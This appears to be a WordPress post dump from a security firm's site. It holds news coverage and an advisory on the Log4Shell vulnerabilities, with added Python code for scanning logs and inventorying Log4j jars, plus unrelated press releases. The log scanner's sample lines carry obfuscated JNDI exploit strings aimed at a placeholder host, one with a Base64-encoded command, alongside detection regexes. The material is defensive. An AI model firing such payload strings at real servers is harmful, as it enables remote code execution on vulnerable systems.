Most of the attacks focus on cryptocurrency mining done on victims’ dimes, as seen by Sophos, Microsoft and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.
According to Microsoft researchers, beyond coin-miners, they’ve also seen installations of Cobalt Strike, which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.
Also, it could get a lot worse. Cybersecurity researchers at Check Point warned on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.
“Since Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,” they said.
The flaw, which is uber-easy to exploit, has been named Log4Shell. It’s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world’s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.
Mutations May Enable Exploits to Slip Past Protections
On Monday, Check Point reported that Log4Shell’s new, malignant offspring can now be exploited “either over HTTP or HTTPS (the encrypted version of browsing),” they said.
The more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. “It means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,” they wrote.
Because of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 Shellshock family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.
Tactical Shifts
Besides variations that can slip past protections, researchers are also seeing new tactics.
Luke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to “bingsearchlib[.]com,” with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.
But since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there’s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.
“This originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,” Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JNDI) string itself, taking advantage of Log4j's other lookups (such as ${lower:}, ${upper:} and the ${x:-default} syntax) so that the jndi: prefix is only assembled when the vulnerable library evaluates the string.
…All of which achieve the same objective: “to download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,” Richards said.
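Because Log4j resolves nested lookups before it reaches the JNDI one, a detector that matches the literal string ${jndi: misses most of the later waves described above. The following is an added example, not code from Threatpost, Vectra or NetSPI: it URL-decodes a request, collapses the common lookup forms (${lower:}, ${upper:}, and the ${x:-default} syntax) innermost-first, then flags JNDI lookups and decodes a JNDIExploit-style Base64 command segment where one is present. The access-log lines are constructed, and the addresses in them are documentation ranges, not real attacker infrastructure.

```python
"""Normalize obfuscated Log4j lookup strings and flag JNDI lookup attempts in
web server access logs. Added example; not code from Threatpost, Vectra or NetSPI."""
import base64
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no nested "${" inside it.
INNERMOST = re.compile(r"\$\{((?:[^{}$]|\$(?!\{))*)\}")
# JNDI lookup with any of the providers abused in the wild.
JNDI = re.compile(r"jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^\s}\"']+)", re.I)
BASE64_SEGMENT = re.compile(r"/Base64/([A-Za-z0-9+/=]+)", re.I)

def resolve_lookup(body):
    """Reduce one lookup body to what Log4j would substitute for it.
    Handles the forms used to hide the jndi: prefix: ${lower:J}, ${upper:n},
    ${::-d} and ${env:NOPE:-i} (default-value syntax with an empty or unset lookup)."""
    if body.lower().startswith("jndi:"):
        return body                      # keep the evidence, minus the braces
    if ":-" in body:
        return body.split(":-", 1)[1]    # ${anything:-literal} -> literal
    kind, _, arg = body.partition(":")
    if kind.lower() == "lower":
        return arg.lower()
    if kind.lower() == "upper":
        return arg.upper()
    return ""                            # env/sys/date with no default: nothing to recover

def normalize(text, max_passes=20):
    """URL-decode, then collapse lookups innermost-first until nothing changes."""
    text = unquote(text)
    for _ in range(max_passes):
        collapsed = INNERMOST.sub(lambda m: resolve_lookup(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text

def scan_line(line):
    """Return a finding for a log line carrying a JNDI lookup, else None."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if not m:
        return None
    finding = {"protocol": m.group(1).lower(), "target": m.group(2),
               "normalized": norm, "decoded_command": None}
    b = BASE64_SEGMENT.search(norm)      # JNDIExploit-style /Basic/Command/Base64/<cmd>
    if b:
        try:
            finding["decoded_command"] = base64.b64decode(b.group(1)).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            pass
    return finding

def scan_log(lines):
    """Return [(line_index, finding)] for every line that contains a JNDI lookup."""
    return [(i, f) for i, f in ((i, scan_line(l)) for i, l in enumerate(lines)) if f]

# Constructed sample access-log lines; 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:22:14:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:22:14:02 +0000] "GET /${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:${lower:l}dap://203.0.113.7:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZA==} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.5 - - [10/Dec/2021:22:14:03 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%3A1099%2Fx%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:22:14:04 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i, f in scan_log(SAMPLE_LOG):
        print(i, f["protocol"], f["target"], f["decoded_command"])
```

The normalizer deliberately stops at a fixed number of passes and drops lookups it cannot resolve (env, sys, date with no default), so a payload that leans on server-side values still surfaces as a jndi: hit even if its full target is not recoverable offline.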
Bug Has Been Targeted All Month
Attackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.
On Sunday, Sophos researchers said that they’d “already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,” noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.
“Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,” Cloudflare CEO Matthew Prince tweeted on Saturday. “That suggests it was in the wild at least nine days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.”
On Sunday, Cisco Talos chimed in with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. “It is recommended that organizations expand their hunt for scanning and exploit activity to this date,” it advised.
Exploits Attempted on 40% of Corporate Networks
Check Point said on Monday that it’s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it’s seen more than 100 attempts to exploit the vulnerability per minute.
As of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.
(Map omitted: top affected geographies. Source: Check Point.)
Hyperbole isn’t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: “It wouldn’t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,” Dali noted via email on Monday. “Connecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren’t taken right away.”
As has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability “is relatively easy to exploit, and we’ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,” Dali reiterated. “Hopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.”
This situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we’ve seen, along with some of the new protections and detection tools.
More News
Linux botnets have already exploited the flaw. Netlab 360 reported on Saturday that two of its honeypots had been attacked by the Muhstik and Mirai botnets. Following detection of those attacks, the Netlab 360 team found other botnets on the hunt for the Log4Shell vulnerability, including the DDoS family Elknot, the mining family m8220, SitesLoader, xmrig.pe, xmring.ELF, attack tool 1, attack tool 2, plus one unknown and a PE family. BleepingComputer also reports that it's observed the threat actors behind the Kinsing backdoor and cryptomining botnet "heavily abusing the Log4j vulnerability."
Quebec shut down thousands of sites after disclosure of the Log4Shell flaw. "We need to scan all of our systems," said Canadian Minister Responsible for Digital Transformation and Access to Information Eric Caire in a news conference. "We're kind of looking for a needle in a haystack."
New Protections, Detection Tools
On Saturday, Huntress Labs released a tool – available here – to help organizations test whether their applications are vulnerable to CVE-2021-44228.
Cybereason released Logout4Shell, a “vaccine” for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.
Growing List of Affected Manufacturers, Components
As of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list hosted on GitHub that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. The list indicates whether they’re affected by Log4Shell and provides links to evidence if they are.
Immersive Labs has posted a hands-on lab of the incident.
Lacework has published a blog post regarding how the news affects security best practices at the developer level.
NetSPI has published a blog post that includes details on Log4Shell’s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.
[post_title] => Threatpost: Log4Shell Is Spawning Even Nastier Mutations
[post_excerpt] => On December 13, 2021, NetSPI was featured in an article written by Lisa Vaas for Threatpost.
[guid] => https://www.netspi.com/?p=26964
)
[50] => WP_Post Object
(
[ID] => 26924
[post_date] => 2021-12-10 17:01:28
[post_content] =>
Talk to any security professional and they'll tell you that a vulnerability allowing unauthenticated remote code execution is about as critical as it gets. That is exactly what CVE-2021-44228 allows.
On December 9, 2021, the Apache Log4j zero-day vulnerability was publicly disclosed alongside working exploits, creating a panic across the security community. That Apache shipped a fix within about a day of public disclosure is one indicator of how severe the vulnerability truly is. Given its severity, users are encouraged to take action immediately.
As teams scrambled to address CVE-2021-44228, a second vulnerability emerged: CVE-2021-45046. The fix in Apache Log4j 2.15.0 was deemed "incomplete in certain non-default configurations": when the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern, an attacker who controls Thread Context (MDC) data can still trigger a JNDI lookup. It was initially rated as a denial of service (DoS) and later reassessed as allowing information leak and, in some environments, remote code execution.
...And then another surfaced overnight: CVE-2021-45105. This third Log4j vulnerability is a different failure of the same lookup machinery rather than a repeat of Log4Shell. Versions through 2.16.0 did not protect against uncontrolled recursion from self-referential lookups, so a crafted string in Thread Context data could exhaust the stack and cause a DoS. Log4j 2.17.0 addresses all three.
Continue reading for details on the impact of these critical vulnerabilities, guidance to determine whether your organization is at risk of Log4j exploit, and mitigation recommendations.
What is the impact of the Log4Shell zero-day vulnerability?
The ubiquity of Log4j is the greatest concern. Within 24 hours of disclosure, Apple iCloud, Twitter, Cloudflare, Minecraft, and Steam were reported to have identified the vulnerability in their systems.
Its impact is expected to spread even further given Log4j is widely used across enterprise applications, including mobile applications, thick client applications, web applications, desktop GUI applications, and other Java-based applications to record/log activities within an application.
If exploited, cybercriminals can take control of an affected system remotely.
Is my organization vulnerable?
The first step to threat mitigation is to understand Log4j’s presence in your organization. To answer the question “Which of my applications use Log4j?” NetSPI recommends:
Searching code repositories and deployment configuration for the following JVM properties and confirming they carry the value the advisories recommend (log4j2.formatMsgNoLookups=true; both trustURLCodebase properties false). Treat these as stopgaps, not a fix: formatMsgNoLookups only exists in Log4j 2.10 and later and is bypassed in the configurations covered by CVE-2021-45046, and trustURLCodebase=false stops remote class loading but not deserialization-based JNDI attacks.
"log4j2.formatMsgNoLookups"
"com.sun.jndi.rmi.object.trustURLCodebase"
"com.sun.jndi.cosnaming.object.trustURLCodebase"
Check your asset management database for Apache Log4j 2 versions from 2.0-beta9 through 2.16.0 in your environment. If any are present, you are likely vulnerable to at least one of the three CVEs and require an update; 2.17.0 addresses all three. (Log4j 1.x is not affected by Log4Shell itself, but it is end-of-life and should be replaced.)
Check for affected versions of log4j jar files on file systems to prioritize systems that require further analysis.
If a software composition analysis (SCA) tool is being used, request the tool to develop a check for the vulnerability or create a custom check for the incorrect setting.
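One way to carry out the file-system and configuration checks above, as an added example rather than NetSPI tooling: it walks a directory tree, reads the version of each log4j-core jar from its manifest (falling back to the file name), records whether JndiLookup.class is still present (Apache's stopgap was to delete it), and greps startup scripts and property files for the three properties listed above. The fixture jars and start.sh it builds in a temporary directory are constructed stand-ins, not real Log4j builds; the version boundaries follow the Apache advisories.

```python
"""Inventory log4j-core jars and the Log4Shell mitigation properties on a host.
Added example, not NetSPI tooling; version boundaries follow the Apache advisories."""
import os
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_IN = "2.17.0"   # first release addressing CVE-2021-44228, -45046 and -45105
# Properties the post says to search for, with the value the advisories call for.
# Neither is a complete fix: formatMsgNoLookups was bypassable (CVE-2021-45046) and
# trustURLCodebase=false stops remote class loading but not gadget-based JNDI abuse.
EXPECTED_PROPERTIES = {
    "log4j2.formatMsgNoLookups": "true",
    "com.sun.jndi.rmi.object.trustURLCodebase": "false",
    "com.sun.jndi.cosnaming.object.trustURLCodebase": "false",
}
PROPERTY_RE = re.compile("(" + "|".join(map(re.escape, EXPECTED_PROPERTIES)) + r")\s*=\s*(\w+)")
TEXT_SUFFIXES = {".sh", ".bat", ".properties", ".xml", ".conf", ".yml", ".yaml"}

def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0). Pre-releases sort first."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(\w+))?", text or "")
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)

def inspect_jar(jar_path):
    """Return (version, jndi_lookup_present) for a log4j-core jar."""
    with zipfile.ZipFile(jar_path) as z:
        names = set(z.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            version = m.group(1) if m else None
        if version is None:   # fall back to the conventional file name
            m = re.search(r"log4j-core-(.+)\.jar$", os.path.basename(jar_path))
            version = m.group(1) if m else None
        return version, JNDI_LOOKUP_CLASS in names

def classify(version, jndi_present):
    """fixed / vulnerable / mitigated-jndi-removed / unknown-version."""
    v = parse_version(version)
    if v is None:
        return "unknown-version"
    if v >= parse_version(FIXED_IN):
        return "fixed"
    if not jndi_present:
        # Deleting JndiLookup.class closes the JNDI path, but the self-referential
        # lookup recursion of CVE-2021-45105 remains in anything below 2.17.0.
        return "mitigated-jndi-removed"
    return "vulnerable"

def scan(root):
    """Walk root; map each log4j-core jar and each property hit to a finding string."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name.startswith("log4j-core") and path.suffix == ".jar":
            version, jndi = inspect_jar(path)
            findings[rel] = f"{classify(version, jndi)} ({version})"
        elif path.suffix in TEXT_SUFFIXES:
            for name, value in PROPERTY_RE.findall(path.read_text(errors="replace")):
                expected = EXPECTED_PROPERTIES[name]
                verdict = "ok" if value.lower() == expected else f"misconfigured (expected {expected})"
                findings[f"{rel}:{name}"] = f"{value} {verdict}"
    return findings

def make_jar(path, version, include_jndi_lookup):
    """Constructed fixture: a minimal jar with a manifest, not a real Log4j build."""
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi_lookup:
            z.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only

def build_fixture(root):
    """Lay out two constructed applications with differently patched jars and a start script."""
    root = Path(root)
    (root / "app1" / "lib").mkdir(parents=True)
    (root / "app2").mkdir()
    make_jar(root / "app1" / "lib" / "log4j-core-2.14.1.jar", "2.14.1", True)
    make_jar(root / "app2" / "log4j-core-2.15.0.jar", "2.15.0", False)
    make_jar(root / "app2" / "log4j-core-2.17.0.jar", "2.17.0", True)
    (root / "app1" / "start.sh").write_text(
        'JAVA_OPTS="-Dlog4j2.formatMsgNoLookups=false -Dcom.sun.jndi.rmi.object.trustURLCodebase=false"\n')
    return root

def demo():
    """Build the fixture in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan(build_fixture(tmp))

if __name__ == "__main__":
    for key, value in sorted(demo().items()):
        print(f"{key}: {value}")
```

Point scan() at a real root (for example / on a Linux host) to inventory a system; it only opens files named log4j-core*.jar, so shaded or renamed jars that embed Log4j classes still need an SCA tool or a class-level search.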
What can I do to protect my organization?
Review the Apache Log4j security vulnerability announcement and update to the appropriate version of Log4j 2. It is important to follow the mitigation steps outlined by Apache and continuously check in for additional vulnerable instances.
NetSPI also recommends that organizations confirm their vulnerability scanners (Qualys, Nessus, Nexpose, etc.) include checks for these CVEs and keep running them, as this is likely to have lasting impacts.
[post_title] => Log4j: Is My Organization Impacted?
[post_excerpt] => Find out if your organization is vulnerable to the Log4j vulnerabilities, read about the impact of CVE-2021-44228 and its variants, and learn mitigation steps to take.
[guid] => https://www.netspi.com/?p=26924
)
[51] => WP_Post Object
(
[ID] => 26938
[post_date] => 2021-12-10 10:42:37
[post_content] =>
On December 10, 2021, NetSPI was featured in an article written by Help Net Security. Read the full article below or online here.
+++
NetSPI launched its IoT penetration testing services, which will be added to its existing suite of penetration, adversary simulation, and attack surface management capabilities.
With the stark growth of IoT adoption over the past few years, pentesting is now a critical asset for companies to understand and assess the overall strength and accountability of their internet-connected systems against sophisticated and targeted cyber attacks.
NetSPI’s new IoT testing services encompass the following capabilities:
ATM penetration testing. Identify the security issues and common vulnerabilities on relevant ATM systems and provide actionable recommendations for improving the overall security posture.
Automotive penetration testing. Identify security issues on relevant vehicles and provide recommendations to improve the current systems – at any stage of automotive development.
Medical device penetration testing. Through a combination of threat modeling and penetration testing, determine possible medical device security risks and identify whether devices meet or exceed the current standards and recommendations by the FDA Premarket Cybersecurity Guidelines.
Operational technology (OT) architecture and security review. Identify industrial control system (ICS) vulnerabilities with a focus on the OT processes in a Defense in Depth strategy. NetSPI will investigate the configuration and architecture of the systems and help address issues with asset inventory, network configuration, and segmentation.
Embedded penetration testing. Identify embedded system vulnerabilities in a multitiered penetration test across multiple disciplines. Look for security gaps at all stages of embedded development that may affect each layer of the device.
“IoT has become part of our daily lives, but these devices and systems are often overlooked from a security perspective. Tapping into our innovation-driven culture and our best-in-class technologies, NetSPI’s IoT pentesting team is uniquely qualified to find and help fix the most critical security gaps in these systems,” said Aaron Shilts, President and CEO at NetSPI. “Our team is currently gearing up for game changing IoT pentesting projects in 2022. We were selected to test smart city technologies and ATM networks for some of the most transformative organizations in the world. NetSPI is thrilled to be a prominent player in future-proofing IoT security worldwide.”
To keep up with the growth of IoT and assist with the complexity in this space, NetSPI has brought on one of the foremost IoT security experts, Larry Trowell, as Principal Consultant to provide additional leadership, guidance, and accountability within the IoT security practice.
“IoT pentesting has become an important part of security strategy and business processes – especially given the increased connectedness in both personal and professional lives,” said Trowell. “There is currently a gap in the market to effectively monitor and assess the risks of these devices. NetSPI’s new offering allows our team to devote its resources and ensure the security of all embedded devices for our customers.”
[post_title] => Help Net Security: NetSPI offers protection against cybersecurity threats with IoT penetration testing services
[post_excerpt] => On December 10, 2021, NetSPI was featured in an article written by Help Net Security.
[guid] => https://www.netspi.com/?p=26938
)
[52] => WP_Post Object
(
[ID] => 26936
[post_date] => 2021-12-08 10:08:00
[post_content] =>
On December 8, 2021, NetSPI was featured in an article written by David Marshall for VMBlog.com. Read the full article below or online here.
+++
NetSPI announced the launch of its IoT penetration testing services, which will be added to its existing suite of penetration, adversary simulation, and attack surface management capabilities. With the stark growth of IoT adoption over the past few years, pentesting is now a critical asset for companies to understand and assess the overall strength and accountability of their internet-connected systems against sophisticated and targeted cyber attacks.
NetSPI's new IoT testing services encompass the following capabilities:
ATM Penetration Testing. Identify the security issues and common vulnerabilities on relevant ATM systems and provide actionable recommendations for improving the overall security posture. Learn more about ATM pentesting.
Automotive Penetration Testing. Identify security issues on relevant vehicles and provide recommendations to improve the current systems - at any stage of automotive development. Learn more about automotive pentesting.
Medical Device Penetration Testing. Through a combination of threat modeling and penetration testing, determine possible medical device security risks and identify whether devices meet or exceed the current standards and recommendations by the FDA Premarket Cybersecurity Guidelines. Learn more about medical device pentesting.
Operational Technology (OT) Architecture and Security Review. Identify industrial control system (ICS) vulnerabilities with a focus on the OT processes in a Defense in Depth strategy. NetSPI will investigate the configuration and architecture of the systems and help address issues with asset inventory, network configuration, and segmentation. Learn more about OT architecture and security review.
Embedded Penetration Testing. Identify embedded system vulnerabilities in a multitiered penetration test across multiple disciplines. Look for security gaps at all stages of embedded development that may affect each layer of the device. Learn more about embedded pentesting.
"IoT has become part of our daily lives, but these devices and systems are often overlooked from a security perspective. Tapping into our innovation-driven culture and our best-in-class technologies, NetSPI's IoT pentesting team is uniquely qualified to find and help fix the most critical security gaps in these systems," said Aaron Shilts, President and CEO at NetSPI. "Our team is currently gearing up for game changing IoT pentesting projects in 2022. We were selected to test smart city technologies and ATM networks for some of the most transformative organizations in the world. NetSPI is thrilled to be a prominent player in future-proofing IoT security worldwide."
To keep up with the growth of IoT and assist with the complexity in this space, NetSPI has brought on one of the foremost IoT security experts, Larry Trowell, as Principal Consultant to provide additional leadership, guidance, and accountability within the IoT security practice.
"IoT pentesting has become an important part of security strategy and business processes - especially given the increased connectedness in both personal and professional lives," said Trowell. "There is currently a gap in the market to effectively monitor and assess the risks of these devices. NetSPI's new offering allows our team to devote its resources and ensure the security of all embedded devices for our customers."
[post_title] => VMBlog.com: NetSPI Adds IoT Penetration Testing to its Suite of Offensive Security Services
[post_excerpt] => On December 8, 2021, NetSPI was featured in an article written by David Marshall for VMBlog.com.
[guid] => https://www.netspi.com/?p=26936
)
[53] => WP_Post Object
(
[ID] => 26848
[post_date] => 2021-12-08 07:00:00
[post_content] =>
Led by IoT security expert Larry Trowell, the IoT pentesting services focus on securing ATMs, automotive, medical devices, operational technology, and other embedded systems.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the launch of its IoT penetration testing services, which will be added to its existing suite of penetration, adversary simulation, and attack surface management capabilities. With the stark growth of IoT adoption over the past few years, pentesting is now a critical asset for companies to understand and assess the overall strength and accountability of their internet-connected systems against sophisticated and targeted cyber attacks.
NetSPI’s new IoT testing services encompass the following capabilities:
ATM Penetration Testing. Identify the security issues and common vulnerabilities on relevant ATM systems and provide actionable recommendations for improving the overall security posture. Learn more about ATM pentesting.
Automotive Penetration Testing. Identify security issues on relevant vehicles and provide recommendations to improve the current systems – at any stage of automotive development. Learn more about automotive pentesting.
Medical Device Penetration Testing. Through a combination of threat modeling and penetration testing, determine possible medical device security risks and identify whether devices meet or exceed the current standards and recommendations by the FDA Premarket Cybersecurity Guidelines. Learn more about medical device pentesting.
Operational Technology (OT) Architecture and Security Review. Identify industrial control system (ICS) vulnerabilities with a focus on the OT processes in a Defense in Depth strategy. NetSPI will investigate the configuration and architecture of the systems and help address issues with asset inventory, network configuration, and segmentation. Learn more about OT architecture and security review.
Embedded Penetration Testing. Identify embedded system vulnerabilities in a multitiered penetration test across multiple disciplines. Look for security gaps at all stages of embedded development that may affect each layer of the device. Learn more about embedded pentesting.
“IoT has become part of our daily lives, but these devices and systems are often overlooked from a security perspective. Tapping into our innovation-driven culture and our best-in-class technologies, NetSPI’s IoT pentesting team is uniquely qualified to find and help fix the most critical security gaps in these systems," said Aaron Shilts, President and CEO at NetSPI. "Our team is currently gearing up for game changing IoT pentesting projects in 2022. We were selected to test smart city technologies and ATM networks for some of the most transformative organizations in the world. NetSPI is thrilled to be a prominent player in future-proofing IoT security worldwide."
To keep up with the growth of IoT and assist with the complexity in this space, NetSPI has brought on one of the foremost IoT security experts, Larry Trowell, as Principal Consultant to provide additional leadership, guidance, and accountability within the IoT security practice.
“IoT pentesting has become an important part of security strategy and business processes – especially given the increased connectedness in both personal and professional lives,” said Trowell. “There is currently a gap in the market to effectively monitor and assess the risks of these devices. NetSPI’s new offering allows our team to devote its resources and ensure the security of all embedded devices for our customers.”
To learn more about NetSPI’s IoT security capabilities, visit the NetSPI website.
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Adds IoT Penetration Testing to its Suite of Offensive Security Services
[post_excerpt] => Learn about NetSPI’s IoT security services, including ATM, automotive, medical devices, operational technology (OT), and embedded system penetration testing services.
[guid] => https://www.netspi.com/?p=26848
)
[54] => WP_Post Object
(
[ID] => 26751
[post_date] => 2021-11-30 07:00:15
[post_content] =>
Co-authored by two of the world’s foremost experts on Azure cybersecurity, the book explores how to perform successful pentesting and risk assessment of Microsoft Azure environments.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the launch of Penetration Testing Azure for Ethical Hackers, a book co-authored by NetSPI practice director Karl Fosaaen and global cloud security consultant David Okeyode. Written to provide security professionals hands-on lessons and tips for successful Azure penetration testing, the book serves as a resource for industry professionals to simulate real-world Azure attacks and learn how to better identify vulnerabilities.
To keep sensitive data secure as businesses migrate from on-premise environments to the cloud, pentesting has become a necessity for all organizations operating in Microsoft Azure. This investment ensures that organizations have consistent visibility into security gaps in cloud infrastructures, and provides actionable guidance to remediate vulnerabilities and improve organizations’ overall cloud security posture.
“The cloud is top of mind for nearly all of today’s security professionals and will continue to be a vital aspect to IT spend,” said author Karl Fosaaen, practice director at NetSPI. “This book provides a digestible framework for professionals of all levels to better understand pentesting within Azure environments. It offers hands-on exercises for readers to test their skills and learn key pentesting techniques that are crucial to successfully assess Azure environments in today’s ecosystem.”
Penetration Testing Azure for Ethical Hackers takes readers through the prerequisites for Azure penetration testing, while also giving step-by-step instructions on how to set up a pentesting lab. Readers will also learn how to simulate an attack on Azure assets, demonstrating the techniques and methodologies an attacker uses to gain persistent access to cloud environments.
“With the rapid acceleration to cloud-based environments and increased gaps in Azure security implementations, penetration testing is becoming an increasingly important skill for security professionals to utilize,” said David Okeyode, co-author and EMEA chief technology officer, Azure Cloud at Palo Alto Networks. “IT teams will come to understand how hackers attack resources hosted within Azure, learn how to effectively protect their environments from these threats, and extend their current pentesting skill sets and capabilities.”
Order Penetration Testing Azure for Ethical Hackers now on Amazon. To learn more about NetSPI’s Azure cloud penetration testing capabilities, visit the NetSPI website.
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Practice Director Publishes Azure Penetration Testing Book for Ethical Hackers
[post_excerpt] => Learn about Azure cloud penetration testing in this book written by NetSPI practice director Karl Fosaaen.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-karl-fosaaen-publishes-azure-penetration-testing-book
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:42
[post_modified_gmt] => 2022-12-16 16:51:42
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26751
[menu_order] => 212
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[55] => WP_Post Object
(
[ID] => 26705
[post_author] => 91
[post_date] => 2021-11-18 12:30:11
[post_date_gmt] => 2021-11-18 18:30:11
[post_content] =>
On November 18, 2021, NetSPI was featured in an article written by Ionut Arghire for SecurityWeek. Read the full article below or online here.
Microsoft on Wednesday informed customers about a recently patched information disclosure vulnerability affecting Azure Active Directory (AD).
Tracked as CVE-2021-42306 (CVSS score of 8.1), the vulnerability exists because of the manner in which Automation Account “Run as” credentials are created when a new Automation Account is set up in Azure.
Due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) ended up being stored in clear text in Azure AD and could be accessed by anyone with access to information on App Registrations. An attacker could use these credentials to authenticate as the App Registration.
Security researchers with enterprise penetration testing firm NetSPI, who identified the vulnerability, explain that an attacker could leverage the bug to escalate privileges to Contributor of any subscription that has an Automation Account, and access resources in the affected subscriptions.
“This includes credentials stored in key vaults and any sensitive information stored in Azure services used in the subscription. Or worse, they could disable or delete resources and take entire Azure tenants offline,” the researchers explain.
According to Microsoft, the vulnerability is related to the keyCredentials property, which was designed for configuring authentication credentials for applications, and which accepts a certificate containing public key data for authentication, but which also incorrectly stored such certificates.
